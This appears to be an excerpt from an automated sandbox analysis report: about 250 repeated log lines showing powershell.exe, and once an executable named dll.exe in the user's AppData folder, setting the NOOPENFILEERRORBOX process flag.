            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Local\dll.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
